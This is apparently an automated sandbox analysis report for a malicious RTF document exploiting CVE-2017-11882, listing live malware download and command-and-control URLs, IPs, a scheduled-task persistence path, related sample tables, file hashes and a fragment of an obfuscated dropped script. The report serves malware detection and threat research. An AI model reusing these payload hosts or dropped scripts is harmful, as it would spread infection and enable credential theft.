            http://23.94.148.16/90/WEFV.txt | 0% | Avira URL Cloud | safe
            http://www.autoitscript.com/autoit3 | 0% | Avira URL Cloud | safe
            http://23.94.148.16 | 2% | Virustotal |
            http://prolinice.ga/index.php | 100% | Avira URL Cloud | malware
            http://vilendar.ga/index.php | 100% | Avira URL Cloud | malware
            http://prolinice.ga/index.phpMozilla/5.0 | 0% | Avira URL Cloud | safe
            http://www.piriform.com/ccleaner | 0% | Virustotal |
            http://wehtwifahcxeheu.com/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe
            http://prolinice.ga/index.php | 19% | Virustotal |
            https://ia803104.us.archive.org/27/items/vbs_20240LR | 0% | Avira URL Cloud | safe
            http://23.94.148.16/90/WEFV.txt | 1% | Virustotal |
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | Avira URL Cloud | safe
            http://www.autoitscript.com/autoit3 | 0% | Virustotal |
            http://prolinice.ga/index.phpMozilla/5.0 | 1% | Virustotal |
            http://vilendar.ga/index.php | 17% | Virustotal |
            https://ia803104.us.archive.org/27/items/vbs_20240LR | 1% | Virustotal |
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | Virustotal |
            Contacted domains
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            ia803104.us.archive.org | 207.241.232.154 | true | true | | unknown
            prolinice.ga | 185.251.91.119 | true | true | | unknown
            Contacted URLs
            Name | Malicious | Antivirus Detection | Reputation
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF | true | Virustotal 1%; Avira URL Cloud: malware | unknown
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | true | URL Reputation: malware | unknown
            http://23.94.148.16/90/WEFV.txt | true | Virustotal 1%; Avira URL Cloud: safe | unknown
            http://prolinice.ga/index.php | true | Virustotal 19%; Avira URL Cloud: malware | unknown
            http://vilendar.ga/index.php | true | Virustotal 17%; Avira URL Cloud: malware | unknown
            URLs found in memory and dropped files
            Each entry gives the URL, whether the report marks it malicious, the antivirus verdicts and the reputation, followed by the memory dumps or dropped files it was found in.

            http://www.piriform.com/ccleanerxe (malicious: false; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmp
            https://duckduckgo.com/chrome_newtab (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr
            http://nuget.org/NuGet.exe (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp
            http://prolinice.ga/ndex.php (malicious: true; Virustotal 1%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000002.432154791.00000000003D6000.00000004.00000020.00020000.00000000.sdmp
            https://duckduckgo.com/ac/?q= (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr
            Http://prolinice.ga/index.phpBB74 (malicious: true; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000002.630809600.00000000078EA000.00000004.00000001.00020000.00000000.sdmp
            http://crl.entrust.net/server1.crl0 (malicious: false; URL Reputation: safe, listed twice; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp
            https://ia803104.us.archive.org (malicious: true; Virustotal 1%; Avira URL Cloud: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.363808831.0000000002629000.00000004.00000800.00020000.00000000.sdmp
            http://ocsp.entrust.net03 (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp
            http://prolinice.ga/ (malicious: true; Virustotal 16%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000002.432154791.00000000003DA000.00000004.00000020.00020000.00000000.sdmp
            http://wehtwifahcxeheu.com/ (malicious: false; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000002.630809600.00000000078EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp
            https://contoso.com/License (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp
            https://contoso.com/Icon (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 (malicious: false; Virustotal 0%; Avira URL Cloud: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp
            http://www.diginotar.nl/cps/pkioverheid0 (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj (malicious: false; Virustotal 1%; Avira URL Cloud: safe; reputation: unknown)
              Source: EQNEDT32.EXE, 00000001.00000002.348951439.000000000053F000.00000004.00000020.00020000.00000000.sdmp
            https://www.google.com/favicon.ico (malicious: false; Virustotal 0%; Avira URL Cloud: safe; reputation: unknown)
              Source: E2E3.tmp.19.dr
            https://ac.ecosia.org/autocomplete?q= (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr
            http://java.sun.com (malicious: false; Virustotal 0%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmp
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 (malicious: false; Virustotal 0%; Avira URL Cloud: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv (malicious: false; Virustotal 0%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000000.375066007.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375317134.0000000007967000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375066007.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmp
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 (malicious: true; Virustotal 1%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000002.432154791.00000000003DA000.00000004.00000020.00020000.00000000.sdmp
            https://contoso.com/ (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp
            https://nuget.org/nuget.exe (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp
            http://23.94.148.16 (malicious: false; Virustotal 2%; Avira URL Cloud: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.363808831.0000000002749000.00000004.00000800.00020000.00000000.sdmp
            http://www.piriform.com/ccleaner (malicious: false; Virustotal 0%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000000.375066007.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375317134.0000000007967000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375066007.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmp
            http://go.microsoft.c (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.363633576.00000000005BA000.00000004.00000020.00020000.00000000.sdmp
            http://www.autoitscript.com/autoit3 (malicious: false; Virustotal 0%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmp
            https://support.mozilla.org (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmp
            http://prolinice.ga/index.phpMozilla/5.0 (malicious: true; Virustotal 1%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000002.432154791.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.419574794.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.421675719.0000000000404000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.628871617.0000000000744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.628530287.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.628826534.00000000003C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.628600513.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.628599452.0000000000444000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.628577670.00000000003DE000.00000004.00000020.00020000.00000000.sdmp
            http://ocsp.entrust.net0D (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000005.00000002.368085766.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.363808831.00000000024F1000.00000004.00000800.00020000.00000000.sdmp
            https://secure.comodo.com/CPS0 (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp
            http://wehtwifahcxeheu.com/application/x-www-form-urlencodedMozilla/5.0 (malicious: false; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr
            https://ia803104.us.archive.org/27/items/vbs_20240LR (malicious: false; Virustotal 1%; Avira URL Cloud: safe; reputation: unknown)
              Source: powershell.exe, 00000005.00000002.368085766.0000000002B22000.00000004.00000800.00020000.00000000.sdmp
            http://crl.entrust.net/2048ca.crl0 (malicious: false; URL Reputation: safe; reputation: unknown)
              Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= (malicious: false; Virustotal 0%; Avira URL Cloud: safe; reputation: unknown)
              Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr
            Contacted IPs
            IP | Domain | Country | ASN | ASN Name | Malicious
            207.241.232.154 | ia803104.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
            23.94.148.16 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
            185.251.91.119 | prolinice.ga | Russian Federation | 35278 | SPRINTHOSTRU | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1502248
            Start date and time:2024-08-31 19:24:12 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 38s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of new started processes analysed:28
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
            Detection:MAL
            Classification:mal100.bank.troj.spyw.expl.evad.winRTF@36/20@10/3
            EGA Information:
            • Successful, ratio: 80%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 135
            • Number of non-executed functions: 95
            Cookbook Comments:
            • Found application associated with file extension: .rtf
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3312 because there are no executed functions
• Execution Graph export aborted for target gwseuha, PID 4020 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3516 because it is empty
• Not all processes were analyzed; the report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:25:31 | Task Scheduler | Run new task: Firefox Default Browser Agent E7F8FCB5C6098564 path: C:\Users\user\AppData\Roaming\gwseuha
13:24:58 | API Interceptor | 287x Sleep call for process: EQNEDT32.EXE modified
13:25:01 | API Interceptor | 77x Sleep call for process: powershell.exe modified
13:25:01 | API Interceptor | 7x Sleep call for process: wscript.exe modified
13:25:21 | API Interceptor | 119006x Sleep call for process: explorer.exe modified
13:25:32 | API Interceptor | 5x Sleep call for process: gwseuha modified
13:25:32 | API Interceptor | 208x Sleep call for process: taskeng.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
207.241.232.154 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtf | malicious | Remcos |
207.241.232.154 | Order enquiry.xla.xlsx | malicious | Remcos |
207.241.232.154 | Order enquiry.xla.xlsx | malicious | Remcos |
207.241.232.154 | 40830001.xls | malicious | SmokeLoader |
207.241.232.154 | inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx | malicious | AgentTesla |
207.241.232.154 | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos |
207.241.232.154 | RFQ -PO-SMT290824.xls | malicious | Remcos |
207.241.232.154 | SI_56127.vbs | malicious | Remcos |
207.241.232.154 | CAN_POST2617276.vbs | malicious | Remcos |
207.241.232.154 | CAN_POST7865678.vbs | malicious | AsyncRAT |
23.94.148.16 | 40830001.xls | malicious | SmokeLoader | 23.94.148.16/90/WEFV.txt
185.251.91.119 | 40830001.xls | malicious | SmokeLoader | prolinice.ga/index.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
prolinice.ga | 40830001.xls | malicious | SmokeLoader | 185.251.91.119
prolinice.ga | #20240627_Edlen_B.xls | malicious | SmokeLoader | 77.232.129.190
prolinice.ga | 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | malicious | SmokeLoader | 77.232.129.190
prolinice.ga | #20240627_Edlen_A.xls | malicious | SmokeLoader | 77.232.129.190
ia803104.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtf | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | Order enquiry.xla.xlsx | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | Order enquiry.xla.xlsx | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | 40830001.xls | malicious | SmokeLoader | 207.241.232.154
ia803104.us.archive.org | inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
ia803104.us.archive.org | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | RFQ -PO-SMT290824.xls | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | SI_56127.vbs | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | CAN_POST2617276.vbs | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | CAN_POST7865678.vbs | malicious | AsyncRAT | 207.241.232.154
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SPRINTHOSTRU | 40830001.xls | malicious | SmokeLoader | 185.251.91.119
SPRINTHOSTRU | 2ZJuaB7CQ4.exe | malicious | DCRat | 141.8.194.149
SPRINTHOSTRU | 5P9EdUgv5r.exe | malicious | DCRat | 141.8.194.149
SPRINTHOSTRU | 06wRHV3NYY.exe | malicious | DCRat | 141.8.192.103
SPRINTHOSTRU | bfderfg.exe | malicious | DCRat, PureLog Stealer, zgRAT | 141.8.197.42
SPRINTHOSTRU | YMtjYvZX2i.exe | malicious | DCRat | 141.8.197.42
SPRINTHOSTRU | p7oBHwDt23.exe | malicious | DCRat | 141.8.197.42
SPRINTHOSTRU | pxkGBmsm1Y.exe | malicious | DCRat | 141.8.193.236
SPRINTHOSTRU | N7lmWFMEgx.exe | malicious | DCRat | 141.8.192.126
SPRINTHOSTRU | X1BQ0d74HR.exe | malicious | DCRat | 141.8.197.42
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtf | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | Order enquiry.xla.xlsx | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | Order enquiry.xla.xlsx | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | 40830001.xls | malicious | SmokeLoader | 207.241.232.154
INTERNET-ARCHIVEUS | INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js | malicious | AgentTesla | 207.241.227.86
INTERNET-ARCHIVEUS | inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js | malicious | AgentTesla | 207.241.227.86
INTERNET-ARCHIVEUS | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | RFQ -PO-SMT290824.xls | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | SI_56127.vbs | malicious | Remcos | 207.241.232.154
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtf | malicious | Remcos | 192.3.243.166
AS-COLOCROSSINGUS | Order enquiry.xla.xlsx | malicious | Remcos | 192.3.243.166
AS-COLOCROSSINGUS | Order enquiry.xla.xlsx | malicious | Remcos | 192.3.243.166
AS-COLOCROSSINGUS | 40830001.xls | malicious | SmokeLoader | 23.94.148.16
AS-COLOCROSSINGUS | rAwGQLtWJr.exe | malicious | Remcos | 23.95.60.82
AS-COLOCROSSINGUS | inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx | malicious | AgentTesla | 107.175.229.146
AS-COLOCROSSINGUS | SALKI098765R400.exe | malicious | Remcos | 192.210.150.26
AS-COLOCROSSINGUS | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 198.46.178.181
AS-COLOCROSSINGUS | RFQ -PO-SMT290824.xls | malicious | Remcos | 192.3.140.102
AS-COLOCROSSINGUS | RFQ_0020829024SEPT.xla.xlsx | malicious | Unknown | 198.46.178.181
Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtf | malicious | Remcos | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | Order enquiry.xla.xlsx | malicious | Remcos | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | Order enquiry.xla.xlsx | malicious | Remcos | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | 40830001.xls | malicious | SmokeLoader | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | RFQ -PO-SMT290824.xls | malicious | Remcos | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | RFQ_0020829024SEPT.xla.xlsx | malicious | Unknown | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | Sepco RFQ.xls | malicious | Remcos | 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf | malicious | Remcos | 207.241.232.154
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Roaming\gwseuha | 40830001.xls | malicious | SmokeLoader |
C:\Users\user\AppData\Roaming\gwseuha | capcut Setup-x64.msi | malicious | RedLine |
C:\Users\user\AppData\Roaming\gwseuha | 7YZlAbfKMg.rtf | malicious | AgentTesla |
C:\Users\user\AppData\Roaming\gwseuha | Product Inquiry466789.xls | malicious | AgentTesla |
C:\Users\user\AppData\Roaming\gwseuha | A24-00342B139336 #TW_Inquiry.xls | malicious | SmokeLoader |
C:\Users\user\AppData\Roaming\gwseuha | LgTFM1JlJu.rtf | malicious | AgentTesla |
C:\Users\user\AppData\Roaming\gwseuha | #20240627_Edlen_B.xls | malicious | SmokeLoader |
C:\Users\user\AppData\Roaming\gwseuha | #20240627_Edlen_A.xls | malicious | SmokeLoader |
C:\Users\user\AppData\Roaming\gwseuha | Requirements.xla.xlsx | malicious | AveMaria, UACMe |
C:\Users\user\AppData\Roaming\gwseuha | vns.exe | malicious | AsyncRAT, VenomRAT |
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4760
                                                    Entropy (8bit):4.834060479684549
                                                    Encrypted:false
                                                    SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                    MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                    SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                    SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                    SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                    Malicious:false
                                                    Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):183084
                                                    Entropy (8bit):3.886576284833851
                                                    Encrypted:false
                                                    SSDEEP:3072:bYFoL2rQi6toiBDgt5p0Gwo9QjS7/DVRq9f1y9uuYaROM5e:0uqrh6BGqykae
                                                    MD5:5AC26F4D93962796DB9CD2E19B32B200
                                                    SHA1:9856C349AD2B408CDD23AA63A620F22FBDA87FA3
                                                    SHA-256:E3E7A3D0BA55B8DBBE3633B1DAD0A3BBF4EADA72DD8DF3F7B1BC76A692862F23
                                                    SHA-512:4C806A0A8FBA3FA9B24A0631D5A3E12F87E21AB3E45F44ECA8DE8C756F436B56E14D383A8B871BD5B5781624AC10E55F2FAD92DE02FA98E6FA53F57D6864B00A
                                                    Malicious:false
                                                    Preview:......a.O.L.h.K.f.L.q.J.U. .=. .".Z.n.f.L.W.m.C.c.G.n.".....U.z.p.u.L.N.N.f.K.k. .=. .".O.e.h.A.Q.W.U.x.L.L.".....L.c.g.O.G.K.m.K.c.L. .=. .".H.b.L.k.L.t.L.W.c.Q.".....v.c.U.s.f.l.Z.R.l.C. .=. .".m.L.u.b.S.T.k.K.W.h.".....k.O.G.G.J.A.l.U.e.f. .=. .".Z.R.f.K.z.W.L.Z.J.b.".....U.z.G.O.h.b.i.W.W.U. .=. .".Z.h.i.K.J.L.G.c.x.L.".....R.N.W.W.P.c.W.L.p.k. .=. .".i.n.L.c.R.a.L.O.R.T.".........L.J.R.H.p.W.O.L.i.A. .=. .".H.A.N.i.C.K.K.a.o.W.".....L.l.i.x.u.b.W.i.P.a. .=. .".e.C.P.x.b.Z.k.A.Q.c.".....c.a.W.i.l.m.i.U.Z.o. .=. .".P.O.b.f.c.P.W.t.m.W.".....p.b.n.Q.m.p.o.i.K.u. .=. .".Q.k.Z.A.v.l.I.x.c.J.".....P.q.i.G.N.O.k.W.u.S. .=. .".u.N.U.K.c.i.G.p.d.h.".....U.g.n.I.L.e.z.U.i.t. .=. .".I.W.G.c.L.u.h.W.H.k.".....o.a.k.C.e.o.A.L.z.i. .=. .".P.W.Z.Z.K.m.A.O.l.f.".....C.N.i.P.K.n.o.h.s.e. .=. .".N.G.U.q.L.d.i.z.G.W.".....P.c.K.P.T.W.k.e.Q.L. .=. .".s.h.N.H.b.z.k.W.T.W.".....L.N.G.L.t.A.H.i.d.G. .=. .".k.h.U.h.J.A.i.Z.P.W.".........P.c.Z.W.h.a.U.a.Q.s. .=. .".c.c.v.G.G.k.H.G.T.f.".....z.z.k.P.x.L.K.
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):16384
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:CE338FE6899778AACFC28414F2D9498B
                                                    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
